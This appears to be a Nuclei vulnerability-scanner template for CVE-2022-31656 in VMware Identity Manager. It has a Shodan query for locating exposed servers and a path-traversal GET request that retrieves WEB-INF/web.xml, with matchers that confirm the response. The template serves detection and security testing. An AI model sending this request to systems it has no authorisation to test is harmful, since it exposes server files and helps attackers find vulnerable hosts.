55 lines
1.9 KiB
YAML
55 lines
1.9 KiB
YAML
id: CVE-2022-31656
|
|
|
|
info:
|
|
name: VMware - Local File Inclusion
|
|
author: DhiyaneshDk
|
|
severity: critical
|
|
description: |
|
|
VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
|
|
remediation: |
|
|
To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations.
|
|
reference:
|
|
- https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
|
|
- https://www.vmware.com/security/advisories/VMSA-2022-0021.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31656
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-31656
|
|
cwe-id: CWE-287
|
|
epss-score: 0.88737
|
|
epss-percentile: 0.98363
|
|
cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: vmware
|
|
product: identity_manager
|
|
shodan-query: http.favicon.hash:-1250474341
|
|
tags: cve,cve2022,vmware,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<web-app"
|
|
- "<servlet-name>"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/xml"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100dabb63ce26c84f244dde7a98f4770ecd84c27b6fc633d40395a661888d9da48102204137e91098517305c059adc54cad9e40c23dffc135d93aacfb9cf0d3f942b1f5:922c64590222798bb761d5b6d8e72950
|